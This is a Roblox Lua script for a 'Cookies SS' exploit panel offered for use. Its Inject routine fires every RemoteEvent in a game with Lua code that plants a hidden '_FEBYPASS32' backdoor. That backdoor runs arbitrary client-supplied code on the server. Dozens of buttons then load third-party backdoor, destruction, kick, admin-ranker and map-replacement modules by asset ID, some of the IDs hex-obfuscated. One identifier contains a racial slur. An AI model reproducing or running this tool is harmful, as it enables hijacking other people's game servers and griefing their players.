local Players = game:GetService("Players")
local player = Players.LocalPlayer
pcall(function() player:WaitForChild("PlayerGui"):FindFirstChild("Cookies SS"):Destroy() end)
local gui = Instance.new("ScreenGui", player:WaitForChild("PlayerGui"))
gui.Name = "Cookies SS"
gui.ResetOnSpawn = false
local frame = Instance.new("Frame", gui)
frame.Position = UDim2.new(0, 270, 0, 50)
frame.Size = UDim2.new(0, 250, 0, 190)
frame.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
frame.Active = true
frame.Draggable = true
Instance.new("UICorner",frame).CornerRadius=UDim.new(0,3)
Instance.new("UIStroke",frame).Color=Color3.new(1,1,1)
local line = Instance.new("Frame", frame)
line.Position = UDim2.new(0, 0, 0, 39)
line.Size = UDim2.new(0, 250, 0, 1)
line.BackgroundColor3 = Color3.new(1, 1, 1)
line.BorderSizePixel = 0
local KP = Instance.new("Frame", frame)
KP.Position = UDim2.new(0, 0, 0, 40)
KP.Size = UDim2.new(0, 250, 0, 150)
KP.BackgroundTransparency = 1
local KP2 = Instance.new("Frame", KP)
KP2.Position = UDim2.new(0, 0, 0, 0)
KP2.Size = UDim2.new(0, 250, 0, 150)
KP2.BackgroundTransparency = 1
local KP3 = Instance.new("Frame", KP)
KP3.Position = UDim2.new(0, 0, 0, 0)
KP3.Size = UDim2.new(0, 250, 0, 150)
KP3.Visible = false
KP3.BackgroundTransparency = 1
local scroll = Instance.new("ScrollingFrame", KP)
scroll.Position = UDim2.new(0, 0, 0, 0)
scroll.Size = UDim2.new(0, 250, 0, 150)
scroll.BackgroundColor3 = Color3.new(1, 1, 1)
scroll.ScrollBarThickness = 0
scroll.CanvasSize = UDim2.new(0, 0, 2, 0)
scroll.BorderSizePixel = 0
scroll.Visible = false
scroll.BackgroundTransparency = 1
local scroll2 = Instance.new("ScrollingFrame", KP)
scroll2.Position = UDim2.new(0, 0, 0, 0)
scroll2.Size = UDim2.new(0, 250, 0, 150)
scroll2.BackgroundColor3 = Color3.new(1, 1, 1)
scroll2.ScrollBarThickness = 0
scroll2.CanvasSize = UDim2.new(0, 0, 3, 0)
scroll2.BorderSizePixel = 0
scroll2.Visible = false
scroll2.BackgroundTransparency = 1
local scroll3 = Instance.new("ScrollingFrame", KP)
scroll3.Position = UDim2.new(0, 0, 0, 0)
scroll3.Size = UDim2.new(0, 250, 0, 150)
scroll3.BackgroundColor3 = Color3.new(1, 1, 1)
scroll3.ScrollBarThickness = 0
scroll3.CanvasSize = UDim2.new(0, 0, 0, 0)
scroll3.BorderSizePixel = 0
scroll3.Visible = false
scroll3.BackgroundTransparency = 1

local box = Instance.new("TextBox", KP2)
box.Position = UDim2.new(0, 10, 0, 10)
box.Size = UDim2.new(0, 230, 0, 80)
box.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
box.Font = Enum.Font.Gotham
box.Text = 'require(12012115295).load("'..player.Name..'")'
box.PlaceholderText = "-- Cookies SS"
box.TextSize = 10
box.TextColor3 = Color3.new(1, 1, 1)
box.TextTransparency = 0
box.TextXAlignment = Enum.TextXAlignment.Left
box.TextYAlignment = Enum.TextYAlignment.Top
box.ClearTextOnFocus = false
box.TextWrapped = true
local Uis = Instance.new("UIStroke", box)
Uis.Color = Color3.new(1,1,1)
Uis.ApplyStrokeMode = Enum.ApplyStrokeMode.Border
Instance.new("UICorner",box).CornerRadius=UDim.new(0,3)

local function createTextButton(position, size, name, textSize, text, parent)
    local btn = Instance.new("TextButton")
    btn.Position = position
    btn.Size = size
    btn.BackgroundColor3 = Color3.new(0,0,0)
    btn.Name = name
    btn.TextSize = textSize
    btn.Text = text
    btn.TextColor3 = Color3.new(1,1,1)
    btn.Font = Enum.Font.SourceSans
    btn.Parent = parent
    Instance.new("UICorner",btn).CornerRadius=UDim.new(0,3)
    local Uis = Instance.new("UIStroke", btn)
    Uis.Color = Color3.new(1,1,1)
    Uis.ApplyStrokeMode = Enum.ApplyStrokeMode.Border
    return btn
end

local x = createTextButton(UDim2.new(0, 220, 0, 10), UDim2.new(0, 20, 0, 20), "x", 16, "X", frame)
x.MouseButton1Click:Connect(function()
gui:Destroy()
end)

local mini = createTextButton(UDim2.new(0, 190, 0, 10), UDim2.new(0, 20, 0, 20), "mini", 16, "-", frame)
mini.MouseButton1Click:Connect(function()
if KP.Visible then
   frame.Size = UDim2.new(0, 250, 0, 40)
   KP.Visible = false
   mini = false
   line.Visible = false
   mini = true
else
   frame.Size = UDim2.new(0, 250, 0, 190)
   KP.Visible = true
   line.Visible = true
   end
end)

function add()
local file = createTextButton(UDim2.new(0, 160, 0, 10), UDim2.new(0, 20, 0, 20), "file", 12, "File", frame)
file.MouseButton1Click:Connect(function()
if KP2.Visible then
   KP2.Visible = false
   KP3.Visible = true
   scroll.Visible = false
   scroll2.Visible = false
   scroll3.Visible = false
else
   KP2.Visible = true
   KP3.Visible = false
   scroll.Visible = false
   scroll2.Visible = false
   scroll3.Visible = false
   end
end)
end

function notify(title, text)
game:GetService("StarterGui"):SetCore("SendNotification", {
    Title=title,
    Text=text,
    Duration=5,
})
end

local exe = createTextButton(UDim2.new(0, 10, 0, 103), UDim2.new(0, 60, 0, 35), "exe", 16, "Execute", KP2)
exe.MouseButton1Click:Connect(function()
	if game:GetService("JointsService"):FindFirstChild("_FEBYPASS32") then
		local Execute=game:GetService("JointsService"):FindFirstChild("_FEBYPASS32"):FireServer(box.Text)
	else
		notify("Something Was Wrong", "Failed to loadstring: Error 404")
   end
end)

local btn2 = Instance.new("TextButton", KP2)
btn2.Position = UDim2.new(0, 10, 0, 103)
btn2.Size = UDim2.new(0, 60, 0, 35)
btn2.BackgroundColor3 = Color3.new(0,0,0)
btn2.TextSize = 16
btn2.Text = "Inject"
btn2.TextColor3 = Color3.new(1,1,1)
btn2.Font = Enum.Font.SourceSans
Instance.new("UICorner",btn2).CornerRadius=UDim.new(0,3)
btn2.MouseButton1Click:Connect(function()
	local function b_G_V12(see)
		local a = function(ree)
			ree:FireServer([[
                    local folder = Instance.new('RemoteEvent')
                    folder.Name = "_FEBYPASS32"
                    folder.Parent = game:GetService("JointsService")
                    local loadstring = require(13684410229)
                    folder.OnServerEvent:Connect(function(_1,_2)
                       loadstring(_2)()
                    end)
                    ]])
		end
		for i, v in pairs(see:GetChildren()) do
			if v:IsA("RemoteEvent") then
				if not string.match(string.lower(v.Name), "ban") then
					if not string.match(string.lower(v.Name), "kick") then
						a(v)
					end
				end
			end
			b_G_V12(v)
		end
	end
	local Inject = b_G_V12(game:GetService("ReplicatedStorage"))
	local timetoken = 0
	local maxtime = 5
	repeat wait(0.1) timetoken += 0.1 until game:GetService("JointsService"):FindFirstChild("_FEBYPASS32") or timetoken >= maxtime
   add()
   btn2:Destroy()
end)

function execute(s)
	if game:GetService("JointsService"):FindFirstChild("_FEBYPASS32") then
		local Execute=game:GetService("JointsService"):FindFirstChild("_FEBYPASS32"):FireServer(tostring(s)) -- execute
	else
		notify("Something Was Wrong", "Failed to loadstring: Error 404")
	end
end

local clear = createTextButton(UDim2.new(0, 83, 0, 103), UDim2.new(0, 60, 0, 35), "clear", 16, "Clear", KP2)
clear.MouseButton1Click:Connect(function()
box.Text=""
end)

local r6 = createTextButton(UDim2.new(0, 156, 0, 103), UDim2.new(0, 35, 0, 35), "r6", 16, "R6", KP2)
r6.MouseButton1Click:Connect(function()
execute('require(3436957371):r6("'..player.Name..'")')
end)

local re = createTextButton(UDim2.new(0, 204, 0, 103), UDim2.new(0, 35, 0, 35), "re", 16, "RE", KP2)
re.MouseButton1Click:Connect(function()

end)

local page = createTextButton(UDim2.new(0, 10, 0, 10), UDim2.new(0, 70, 0, 130), "page", 10, "Destruction GUI", KP3)
page.MouseButton1Click:Connect(function()
if KP3.Visible then
   KP3.Visible = false
   scroll.Visible = true
else
   KP3.Visible = true
   scroll.Visible = false
   end
end)

local page2 = createTextButton(UDim2.new(0, 90, 0, 10), UDim2.new(0, 70, 0, 130), "page2", 14, "GUI & Script", KP3)
page2.MouseButton1Click:Connect(function()
if KP3.Visible then
   KP3.Visible = false
   scroll2.Visible = true
else
   KP3.Visible = true
   scroll2.Visible = false
   end
end)

local page3 = createTextButton(UDim2.new(0, 170, 0, 10), UDim2.new(0, 70, 0, 130), "page3", 16, "Map", KP3)
page3.MouseButton1Click:Connect(function()
if KP3.Visible then
   KP3.Visible = false
   scroll3.Visible = true
else
   KP3.Visible = true
   scroll3.Visible = false
   end
end)

local guis = createTextButton(UDim2.new(0, 5, 0, 5), UDim2.new(0, 56, 0, 35),"guis",8, "Team fat Gui v21", scroll)
guis.MouseButton1Click:Connect(function()
execute('require(14940596979).fat("'..player.Name..'")')
setclipboard("teamfatguiv19easter")
end)

local guis = createTextButton(UDim2.new(0, 66, 0, 5), UDim2.new(0, 56, 0, 35), "guis",8, "Secret K00pgui v4", scroll)
guis.MouseButton1Click:Connect(function()
execute('require(16965754044):load("'..player.Name..'")')
setclipboard("Zelow")
end)

local guis = createTextButton(UDim2.new(0, 128, 0, 5), UDim2.new(0, 56, 0, 35), "guis",10, "H01PK Gui V21", scroll)
guis.MouseButton1Click:Connect(function()
execute('require(0x4af2144545ce).ALLNIGGAITISKINGV44LEAKKKkh01pkOnTOP("'..player.Name..'")')
end)

local guis = createTextButton(UDim2.new(0, 189, 0, 5), UDim2.new(0, 56, 0, 35), "guis",10, "xpl0id v5 Gui", scroll)
guis.MouseButton1Click:Connect(function()
execute('require(77025880046082).v5("'..player.Name..'")')
end)

local guis = createTextButton(UDim2.new(0, 5, 0, 46), UDim2.new(0, 56, 0, 35), "guis",10, "Dr4g Gui v5", scroll)
guis.MouseButton1Click:Connect(function()
execute('require(0x391c103dd).load("'..player.Name..'")')
end)

local guis = createTextButton(UDim2.new(0, 66, 0, 46), UDim2.new(0, 56, 0, 35), "guis",10, "Darius Gui v13", scroll)
guis.MouseButton1Click:Connect(function()
execute('require(127445614272366).op("'..player.Name..'")')
end)

local guis = createTextButton(UDim2.new(0, 128, 0, 46), UDim2.new(0, 56, 0, 35), "guis",10, "K00pgui v11", scroll)
guis.MouseButton1Click:Connect(function()
execute('require(15267263357).V11("'..player.Name..'")')
end)

local guis = createTextButton(UDim2.new(0, 189, 0, 46), UDim2.new(0, 56, 0, 35), "guis",10, "Tubers93 Gui v5", scroll)
guis.MouseButton1Click:Connect(function()
execute('require(0x6989826cf265)("'..player.Name..'")')
end)

local guis = createTextButton(UDim2.new(0, 5, 0, 87), UDim2.new(0, 56, 0, 35), "guis",10, "Cr4kgui v11", scroll)
guis.MouseButton1Click:Connect(function()
execute('require(132380103487790).Erika("'..player.Name..'")')
end)

local guis = createTextButton(UDim2.new(0, 66, 0, 87), UDim2.new(0, 56, 0, 35), "guis",10, "p00ngkidd Gui", scroll)
guis.MouseButton1Click:Connect(function()
execute('require(15204636597).undetectb("'..player.Name..'")')
end)

local guis = createTextButton(UDim2.new(0, 128, 0, 87), UDim2.new(0, 56, 0, 35), "guis",10, "C4N0F Gui v15.5", scroll)
guis.MouseButton1Click:Connect(function()
execute('require(86767995498200):C4N0FV17("'..player.Name..'")')
end)

local guis = createTextButton(UDim2.new(0, 189, 0, 87), UDim2.new(0, 56, 0, 35), "guis",8, "Team BadsStuff Gui", scroll)
guis.MouseButton1Click:Connect(function()
execute('require(15680206962).rust("'..player.Name..'")')
end)

local guis = createTextButton(UDim2.new(0, 5, 0, 128), UDim2.new(0, 56, 0, 35), "guis",8, "Sheldon.exe Gui", scroll)
guis.MouseButton1Click:Connect(function()
execute('require(96855101727017):Load("'..player.Name..'")')
end)

local guis = createTextButton(UDim2.new(0, 66, 0, 128), UDim2.new(0, 56, 0, 35), "guis",8, "Dryq74 Gui", scroll)
guis.MouseButton1Click:Connect(function()
execute('require(134839673375508).Dryq74gui("'..player.Name..'")')
end)

local guis = createTextButton(UDim2.new(0, 128, 0, 128), UDim2.new(0, 56, 0, 35), "guis",10, "1x1x1x1 Gui", scroll)
guis.MouseButton1Click:Connect(function()
execute('require(6858594080).KrnKidsSus("'..player.Name..'")')
end)

local guis = createTextButton(UDim2.new(0, 189, 0, 128), UDim2.new(0, 56, 0, 35), "guis",8, "Dream-Bull Gui v18", scroll)
guis.MouseButton1Click:Connect(function()
execute('require(15232587754).DreamGUI("'..player.Name..'")')
end)

local guis = createTextButton(UDim2.new(0, 5, 0, 169), UDim2.new(0, 56, 0, 35), "ss", 8, "Blue2Spooky Gui v2", scroll)
guis.MouseButton1Click:Connect(function()
execute('require(132099457182422):blue2spooky("'..player.Name..'")')
end)


local ss = createTextButton(UDim2.new(0, 5, 0, 5), UDim2.new(0, 56, 0, 35), "ss", 10, "144kanz Hub", scroll2)
ss.MouseButton1Click:Connect(function()
execute('require(0x25b56b8f7+-0x6a72c6b3d+0x812296b09):SHHH144anzHUB("'..player.Name..'")')
end)

local ss = createTextButton(UDim2.new(0, 66, 0, 5), UDim2.new(0, 56, 0, 35), "ss", 14, "Polaria", scroll2)
ss.MouseButton1Click:Connect(function()
execute('require(79176073803733).Pload("'..player.Name..'")')
end)

local ss = createTextButton(UDim2.new(0, 128, 0, 5), UDim2.new(0, 56, 0, 35), "ss", 6, "matthew_isabot76RIP gui", scroll2)
ss.MouseButton1Click:Connect(function()
execute('require(6912873833).matthew_isabot76RIP("'..player.Name..'")')
setclipboard("dress code")
end)

local ss = createTextButton(UDim2.new(0, 189, 0, 5), UDim2.new(0, 56, 0, 35), "ss", 14, "Ego Hub", scroll2)
ss.MouseButton1Click:Connect(function()
execute('require(7459584855).OfficialTrirSkiddedScript("'..player.Name..'")')
end)

local ss = createTextButton(UDim2.new(0, 5, 0, 46), UDim2.new(0, 56, 0, 35), "ss", 12, "Sheldoni", scroll2)
ss.MouseButton1Click:Connect(function()
execute('require(15629007042)("'..player.Name..'")')
end)

local ss = createTextButton(UDim2.new(0, 66, 0, 46), UDim2.new(0, 56, 0, 35), "ss", 8, "HD Admin Ranker", scroll2)
ss.MouseButton1Click:Connect(function()
execute('require(7192763922).load("'..player.Name..'")')
end)

local ss = createTextButton(UDim2.new(0, 128, 0, 46), UDim2.new(0, 56, 0, 35), "ss", 12, "Kick Gui", scroll2)
ss.MouseButton1Click:Connect(function()
execute('require(4694654493).load("'..player.Name..'")')
end)

local ss = createTextButton(UDim2.new(0, 189, 0, 46), UDim2.new(0, 56, 0, 35), "ss", 10, "Harked v2", scroll2)
ss.MouseButton1Click:Connect(function()
execute('require(4770241281):hark("'..player.Name..'")')
end)

local ss = createTextButton(UDim2.new(0, 5, 0, 87), UDim2.new(0, 56, 0, 35), "ss", 14, "IY [Edit]", scroll2)
ss.MouseButton1Click:Connect(function()
execute('require(15610593870)("'..player.Name..'")')
end)

local ss = createTextButton(UDim2.new(0, 66, 0, 87), UDim2.new(0, 56, 0, 35), "ss", 10, "Exser [Cracked]", scroll2)
ss.MouseButton1Click:Connect(function()
execute('require(0x308BC2E6B)["ExSer Cracked by LALOL Hub"]("'..player.Name..'")')
end)

local ss = createTextButton(UDim2.new(0, 128, 0, 87), UDim2.new(0, 56, 0, 35), "ss", 10, "Exser [Modded]", scroll2)
ss.MouseButton1Click:Connect(function()
execute('require(13718034160):pls("'..player.Name..'")')
end)

local ss = createTextButton(UDim2.new(0, 189, 0, 87), UDim2.new(0, 56, 0, 35), "ss", 10, "Mr Bean Admin", scroll2)
ss.MouseButton1Click:Connect(function()
execute('require(92684888032460)({Owners={"'..player.Name..'"}})')
end)

local ss = createTextButton(UDim2.new(0, 5, 0, 128), UDim2.new(0, 56, 0, 35), "ss", 12, "Ro-Xploit v7", scroll2)
ss.MouseButton1Click:Connect(function()
execute('require(96184029574075)("'..player.Name..'")')
end)

local ss = createTextButton(UDim2.new(0, 66, 0, 128), UDim2.new(0, 56, 0, 35), "ss", 12, "Earthy Hub", scroll2)
ss.MouseButton1Click:Connect(function()
execute('require(5282751219):Fire("'..player.Name..'")')
end)

local ss = createTextButton(UDim2.new(0, 128, 0, 128), UDim2.new(0, 56, 0, 35), "ss", 12, "Sensation", scroll2)
ss.MouseButton1Click:Connect(function()
execute('require(100263845596551)("'..player.Name..'")')
end)

local ss = createTextButton(UDim2.new(0, 189, 0, 128), UDim2.new(0, 56, 0, 35), "ss", 12, "Trash Hub", scroll2)
ss.MouseButton1Click:Connect(function()
execute('require(17182254638)("'..player.Name..'")')
end)

local ss = createTextButton(UDim2.new(0, 5, 0, 169), UDim2.new(0, 56, 0, 35), "ss", 14, "Sugma_v1", scroll2)
ss.MouseButton1Click:Connect(function()
execute('require(11183244198):s("sugma",game.Players.'..player.Name..')')
end)

local ss = createTextButton(UDim2.new(0, 66, 0, 169), UDim2.new(0, 56, 0, 35), "ss", 14, "T0PK3K v5", scroll2)
ss.MouseButton1Click:Connect(function()
execute('require(0x342D5F0DA)("'..player.Name..'")')
end)

local ss = createTextButton(UDim2.new(0, 128, 0, 169), UDim2.new(0, 56, 0, 35), "ss", 14, "T0PK3K v4", scroll2)
ss.MouseButton1Click:Connect(function()
execute('require(4671686633).die("'..player.Name..'")')
end)

local ss = createTextButton(UDim2.new(0, 189, 0, 169), UDim2.new(0, 56, 0, 35), "ss", 14, "T0PK3K v3", scroll2)
ss.MouseButton1Click:Connect(function()
execute('require(2609384717).load("'..player.Name..'")')
end)

local ss = createTextButton(UDim2.new(0, 5, 0, 210), UDim2.new(0, 56, 0, 35), "ss", 6, "Brickma Ultimate [Beta]", scroll2)
ss.MouseButton1Click:Connect(function()
execute('require(112945327108627).Brickma("'..player.Name..'")')
end)

local ss = createTextButton(UDim2.new(0, 66, 0, 210), UDim2.new(0, 56, 0, 35), "ss", 14, "Blast SS", scroll2)
ss.MouseButton1Click:Connect(function()
execute('require(5596373023).load("'..player.Name..'")')
end)

local ss = createTextButton(UDim2.new(0, 128, 0, 210), UDim2.new(0, 56, 0, 35), "ss", 4, "Project Sonicelijahmania Beta", scroll2)
ss.MouseButton1Click:Connect(function()
execute('require(10973009971).sonic("'..player.Name..'")')
end)

local ss = createTextButton(UDim2.new(0, 189, 0, 210), UDim2.new(0, 56, 0, 35), "ss", 12, "Euphoria v1", scroll2)
ss.MouseButton1Click:Connect(function()
execute('require(96844128852058).euphoria("'..player.Name..'")')
setclipboard("euphoria-v1-1021922233")
end)

local ss = createTextButton(UDim2.new(0, 5, 0, 251), UDim2.new(0, 56, 0, 35), "ss", 12, "Nezor v1.0", scroll2)
ss.MouseButton1Click:Connect(function()
execute('require(100227259985025):Ex("'..player.Name..'")')
end)

local ss = createTextButton(UDim2.new(0, 66, 0, 251), UDim2.new(0, 56, 0, 35), "ss", 10, "Especialgui v2", scroll2)
ss.MouseButton1Click:Connect(function()
execute('require(120934006054841):Especialgui("Solarivar")')
end)

local ss = createTextButton(UDim2.new(0, 128, 0, 251), UDim2.new(0, 56, 0, 35), "ss", 12, "DevConsole", scroll2)
ss.MouseButton1Click:Connect(function()
execute('require(6016746796):Console("'..player.Name..'")')
end)

local ss = createTextButton(UDim2.new(0, 189, 0, 251), UDim2.new(0, 56, 0, 35), "ss", 14, "GwnHub", scroll2)
ss.MouseButton1Click:Connect(function()
execute('require(15244529363).RAroblox("'..player.Name..'")')
end)

local ss = createTextButton(UDim2.new(0, 5, 0, 292), UDim2.new(0, 56, 0, 35), "ss", 10, "UTG + cmdbar", scroll2)
ss.MouseButton1Click:Connect(function()
execute('require(0x2717f826c):Fire(game:GetService('Players'):FindFirstChild("'..player.Name..'") or game:GetService('Players'):FindFirstChild("'..player.Name..'"))')
end)

local ss = createTextButton(UDim2.new(0, 66, 0, 292), UDim2.new(0, 56, 0, 35), "ss", 12, "Blue-Ex v1", scroll2)
ss.MouseButton1Click:Connect(function()
execute('require(3309735650).blueexss("'..player.Name..'")')
end)

local ss = createTextButton(UDim2.new(0, 128, 0, 292), UDim2.new(0, 56, 0, 35), "ss", 14, "CauaHub", scroll2)
ss.MouseButton1Click:Connect(function()
execute('require(6174615549).CauaHub("'..player.Name..'")')
setclipboard("102-291-2391-2129-219-2020")
end)

local ss = createTextButton(UDim2.new(0, 189, 0, 292), UDim2.new(0, 56, 0, 35), "ss", 10, "Backrooms", scroll2)
ss.MouseButton1Click:Connect(function()
execute('')
end)

local ss = createTextButton(UDim2.new(0, 5, 0, 333), UDim2.new(0, 56, 0, 35), "ss", 10, "Backrooms", scroll2)
ss.MouseButton1Click:Connect(function()
execute('')
end)

local ss = createTextButton(UDim2.new(0, 66, 0, 333), UDim2.new(0, 56, 0, 35), "ss", 10, "Backrooms", scroll2)
ss.MouseButton1Click:Connect(function()
execute('')
end)

local ss = createTextButton(UDim2.new(0, 128, 0, 333), UDim2.new(0, 56, 0, 35), "ss", 10, "Backrooms", scroll2)
ss.MouseButton1Click:Connect(function()
execute('')
end)

local ss = createTextButton(UDim2.new(0, 189, 0, 333), UDim2.new(0, 56, 0, 35), "ss", 10, "Backrooms", scroll2)
ss.MouseButton1Click:Connect(function()
execute('')
end)

local ss = createTextButton(UDim2.new(0, 5, 0, 374), UDim2.new(0, 56, 0, 35), "ss", 10, "Backrooms", scroll2)
ss.MouseButton1Click:Connect(function()
execute('')
end)

local ss = createTextButton(UDim2.new(0, 66, 0, 374), UDim2.new(0, 56, 0, 35), "ss", 10, "Backrooms", scroll2)
ss.MouseButton1Click:Connect(function()
execute('')
end)

local ss = createTextButton(UDim2.new(0, 128, 0, 374), UDim2.new(0, 56, 0, 35), "ss", 10, "Backrooms", scroll2)
ss.MouseButton1Click:Connect(function()
execute('')
end)

local ss = createTextButton(UDim2.new(0, 189, 0, 374), UDim2.new(0, 56, 0, 35), "ss", 10, "Backrooms", scroll2)
ss.MouseButton1Click:Connect(function()
execute('')
end)

local ss = createTextButton(UDim2.new(0, 5, 0, 415), UDim2.new(0, 56, 0, 35), "ss", 10, "Backrooms", scroll2)
ss.MouseButton1Click:Connect(function()
execute('')
end)

local ss = createTextButton(UDim2.new(0, 66, 0, 415), UDim2.new(0, 56, 0, 35), "ss", 10, "Backrooms", scroll2)
ss.MouseButton1Click:Connect(function()
execute('')
end)

local ss = createTextButton(UDim2.new(0, 128, 0, 415), UDim2.new(0, 56, 0, 35), "ss", 10, "Backrooms", scroll2)
ss.MouseButton1Click:Connect(function()
execute('')
end)

local ss = createTextButton(UDim2.new(0, 189, 0, 415), UDim2.new(0, 56, 0, 35), "ss", 10, "Backrooms", scroll2)
ss.MouseButton1Click:Connect(function()
execute('')
end)

local map = createTextButton(UDim2.new(0, 5, 0, 5), UDim2.new(0, 56, 0, 35), "map", 10, "Backrooms", scroll3)
map.MouseButton1Click:Connect(function()
execute('require(12313683305).backrooms()')
end)

local map = createTextButton(UDim2.new(0, 66, 0, 5), UDim2.new(0, 56, 0, 35), "map", 8, "Golden Corral's", scroll3)
map.MouseButton1Click:Connect(function()
execute('require(91736492445221).goldencorral()')
end)

local map = createTextButton(UDim2.new(0, 128, 0, 5), UDim2.new(0, 56, 0, 35), "map", 12, "Obby Map", scroll3)
map.MouseButton1Click:Connect(function()
execute('require(7977633723).thisbacon()')
end)

local map = createTextButton(UDim2.new(0, 189, 0, 5), UDim2.new(0, 56, 0, 35), "map", 8, "Mountain House", scroll3)
map.MouseButton1Click:Connect(function()
execute('require(7993365051).CLoad()')
end)

local map = createTextButton(UDim2.new(0, 5, 0, 46), UDim2.new(0, 56, 0, 35), "map", 10, "The Refinary", scroll3)
map.MouseButton1Click:Connect(function()
execute('require(14080317322).Refinary()')
end)

local map = createTextButton(UDim2.new(0, 66, 0, 46), UDim2.new(0, 56, 0, 35), "map", 10, "Tantive Space", scroll3)
map.MouseButton1Click:Connect(function()
execute('require(4081020916).loadmap()')
end)

local map = createTextButton(UDim2.new(0, 128, 0, 46), UDim2.new(0, 56, 0, 35), "map", 10, "CS:GO Office", scroll3)
map.MouseButton1Click:Connect(function()
execute('require(3155301605).loadmap()')
end)

local map = createTextButton(UDim2.new(0, 189, 0, 46), UDim2.new(0, 56, 0, 35), "map", 12, "Guest house", scroll3)
map.MouseButton1Click:Connect(function()
execute('require(4063168815).loadmap()')
end)

local map = createTextButton(UDim2.new(0, 5, 0, 87), UDim2.new(0, 56, 0, 35), "map", 10, "Space Elevator", scroll3)
map.MouseButton1Click:Connect(function()
execute('require(5702244094).space("'..player.Name..'")')
end)

local map = createTextButton(UDim2.new(0, 66, 0, 87), UDim2.new(0, 56, 0, 35), "map", 14, "mosque", scroll3)
map.MouseButton1Click:Connect(function()
execute('require(122050532527015).mosque("'..player.Name..'")')
end)

local map = createTextButton(UDim2.new(0, 128, 0, 87), UDim2.new(0, 56, 0, 35), "map", 16, "NDS", scroll3)
map.MouseButton1Click:Connect(function()
execute('require(14704225060).nds("'..player.Name..'")')
end)

local map = createTextButton(UDim2.new(0, 189, 0, 87), UDim2.new(0, 56, 0, 35), "map", 10, "Prison life", scroll3)
map.MouseButton1Click:Connect(function()
execute('require(14314506567).Load(PrisonLife)')
end)
